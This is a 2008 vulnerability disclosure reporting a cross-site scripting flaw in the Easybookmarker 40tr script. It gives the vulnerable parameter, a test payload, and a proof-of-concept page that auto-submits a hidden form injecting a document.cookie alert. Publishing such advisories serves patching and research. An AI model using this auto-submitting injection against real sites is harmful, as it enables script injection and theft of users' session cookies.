Related information

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

E-Mail header Injection in HiFriend

Vulnerability: SocialEngine (SocialEngine. net) high risk security flaw

[DSECRG-08-031] Local File Include Vulnerability in Interact 2.4.1

MyBlog <=0.9.8 Multiple Vulnerabilities

From:	irancrash_(at)_gmail.com <irancrash_(at)_gmail.com>
Date:	22.07.2008
Subject:	Easybookmarker 40tr Xss Vulnerability By Khashayar Fereidani

----------------------------------------------------------------

Script : Easybookmarker 40tr

Type : Xss Vulnerability

Method : POST

Alert : High

----------------------------------------------------------------

Discovered by : Khashayar Fereidani a.k.a. Dr.Crash

My Offical Website : HTTP://FEREIDANI.IR

Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t] com

----------------------------------------------------------------

Khashayar Fereidani Offical Website : HTTP://FEREIDANI.IR

----------------------------------------------------------------

Script Download : http://myiosoft.com/download/EasyBookMarker/easybookmarker-40tr.zip

----------------------------------------------------------------
Xss Vulnerability :

Variable : rs
Send Method : POST

Set rs variable with post method in ajaxp_backend.php : <script>alert('xss')</script> for test
vulnerability

<html>
<head></head>
<body onLoad=javascript:document.form.submit()>

<form action="http://example/zomplog/ajaxp_backend.php"

method="POST" name="form">

<input type="hidden" name="rs" value="" <script>alert(document.cookie)</script>">

</form>
</body>
</html>

----------------------------------------------------------------

                       Tnx : God

                    HTTP://IRCRASH.COM

----------------------------------------------------------------